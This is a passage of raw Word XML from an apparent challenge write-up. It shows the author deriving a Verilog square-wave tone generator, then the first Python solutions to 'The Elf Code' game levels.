        <w:t>/2 -1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in my “counter” against each frequency generated a baseline that I could then muck about with to see if I was getting closer or further to an answer. The results were unexpected, possibly because I haven’t done math like this in over ten years and when I did I wasn’t very good at it. For 500Mhz, </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>freq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>*5)/2-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> worked perfectly.</w:t>
      </w:r>
      <w:r w:rsidR="00342C83">
        <w:t xml:space="preserve"> Stumbling upon this gave me grave misconceptions about what I was doing and how to move forward successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F6EFB" w14:textId="468D2BBD" w:rsidR="00E00F99" w:rsidRDefault="00E00F99">
      <w:r>
        <w:t xml:space="preserve">The answer for 1Khz was not nearly as straightforward. I ran tests to get closer and closer to the value only to end up way off or no longer creating a square wave. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D3DB4F" w14:textId="2358524A" w:rsidR="00E00F99" w:rsidRDefault="00E00F99">
      <w:r>
        <w:t>I was not making any progress</w:t>
      </w:r>
      <w:r w:rsidR="00342C83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and decided that I should ultimately understand what was at hand better so I could create a single solution that handles 3 static inputs and one random.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60685197" w14:textId="0FF37EBA" w:rsidR="00E00F99" w:rsidRDefault="00A108E8">
      <w:r>
        <w:t xml:space="preserve">Eventually, I came across this post and code: </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://electronics.stackexchange.com/questions/205749/generation-of-square-wave-using-veilog</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DFA3602" w14:textId="117DADBA" w:rsidR="00A108E8" w:rsidRDefault="00A108E8">
      <w:r>
        <w:t>Based on the formula for the period based on clock speed and frequency, I determined that if I could calculate the period, I could then use that to find the midway point and set the counters in the code appropriately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3306114D" w14:textId="75C00F3A" w:rsidR="00A108E8" w:rsidRDefault="00A108E8">
      <w:r>
        <w:t xml:space="preserve">The period needs to be found by the following formula: </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeIndentedChar"/>
        </w:rPr>
        <w:t>(12500000000)/(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeIndentedChar"/>
        </w:rPr>
        <w:t>freq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeIndentedChar"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4541A1A3" w14:textId="19B9CDAB" w:rsidR="00A108E8" w:rsidRDefault="00A108E8">
      <w:r>
        <w:t>The code was adaptable with only a few edits. By assigning the period then using (</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>period – 1</w:t>
      </w:r>
      <w:r>
        <w:t>) and (</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>period/2</w:t>
      </w:r>
      <w:r>
        <w:t>) to find the midway points instead of explicitly defining the numbers as in the example, the code should be responsive to all frequency inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0813E33B" w14:textId="3E284133" w:rsidR="00A108E8" w:rsidRDefault="00A108E8">
      <w:r>
        <w:t>When I first ran the code, the answers were all off by several factors of 10 but were promising.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC2437" w14:textId="1F0450AF" w:rsidR="00A108E8" w:rsidRDefault="00A108E8">
      <w:r>
        <w:t xml:space="preserve">By adding more ‘0’s to my period equation, the answer got more and more accurate. </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>I probably made a big error converting from units somewhere.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0397FCC1" w14:textId="7E57812F" w:rsidR="00A108E8" w:rsidRDefault="00A108E8">
      <w:r>
        <w:t>However! When I got to the number of ‘0’s I needed, the resulting number was too big to handle. To alleviate this, I divided first by the largest number supported then divided it again by 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E03D3D1" w14:textId="0CDD219B" w:rsidR="00A108E8" w:rsidRDefault="0097416F">
      <w:r>
        <w:t>The following code successfully generates a square wave at every frequency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025B51F" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>`timescale 1ns/1ns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A23B4E" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tone_generator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C9FF65" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    input </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B579A4A" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    input </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC6BF22" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    input [31:0] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>freq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759F424E" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    output </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wave_out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79BFAB0F" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4912610D" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    // ---- DO NOT CHANGE THE CODE ABOVE THIS LINE ---- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6121FA46" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    // ---- IT IS NECESSARY FOR AUTOMATED ANALYSIS ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8B455D" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    // TODO: Add your code below. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF0FD3E" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// Counter for toggling of clock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5430021F" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>integer counter = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CE4DDB" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">reg </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sq_wave_reg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158DA84C" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">assign </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wave_out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sq_wave_reg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767E2800" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    integer period = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D17146" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF36C36" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    always @(posedge </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8B2F07" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C981076" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        begin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC4E72" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        period &lt;= (1250000000)/(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>freq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231A1B25" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == 1'b1  ||  counter == (period - 1)) // period, count from 0 to n-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9028F8" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                counter &lt;= 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2480735C" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED64BEA" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                counter &lt;= counter + 1'b1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2B3264" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A38ECD6" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            // synchronous output without glitches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E2A4AA" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == 1'b0  &amp;&amp;  counter &lt; (period/2)) // duty cycle, m cycles high</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D3B5D9" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sq_wave_reg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;= 1'b1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F40021" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016B42F5" w14:textId="575B1B33" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sq_wave_reg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;= 1'b0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF45499" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5E2FC6" w14:textId="77777777" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5EE983" w14:textId="6A5B9B20" w:rsidR="0097416F" w:rsidRDefault="0097416F" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>endmodule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08ED71DB" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF5DA6E" w14:textId="77656C02" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Terminals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139C7586" w14:textId="1F6245FD" w:rsidR="0094724D" w:rsidRPr="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Terminals are presented in alphabetical order and have no relation to difficulty or linearity to objectives or plot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632DB9B2" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>The Elf Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C39CEE8" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">The Elf Code is back, this time in Python instead of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. We need to beat eight levels of The Elf Code for help from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ribb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bonbowford</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Solutions to each level are below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C3940B" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Level 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0087B781" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A1323EA" w14:textId="35C92470" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00A54818">
        <w:t xml:space="preserve">import elf, munchkins, levers, lollipops, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54818">
        <w:t>yeeters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54818">
        <w:t>, pits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B55B181" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveLeft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2187A3F1" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA9149D" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="5088B07D" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Level 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D70E873" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E78327" w14:textId="71978908" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00A54818">
        <w:t xml:space="preserve">import elf, munchkins, levers, lollipops, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54818">
        <w:t>yeeters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54818">
        <w:t>, pits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9F3D8C" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>all_lollipops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lollipops.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A08D72F" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lollipop1 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>all_lollipops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7034102C" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lollipop0 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lollipops.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D499E" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveTo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(lollipop1.position)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDDFFF3" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveTo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(lollipop0.position)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B0E70A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveLeft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159C5BB4" w14:textId="4F926269" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD63FCB" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A76BF8A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Level 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217A8CAA" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289EDEFC" w14:textId="5F5A2CEE" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import elf, munchkins, levers, lollipops, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yeeters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, pits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD38D1" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lever0 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
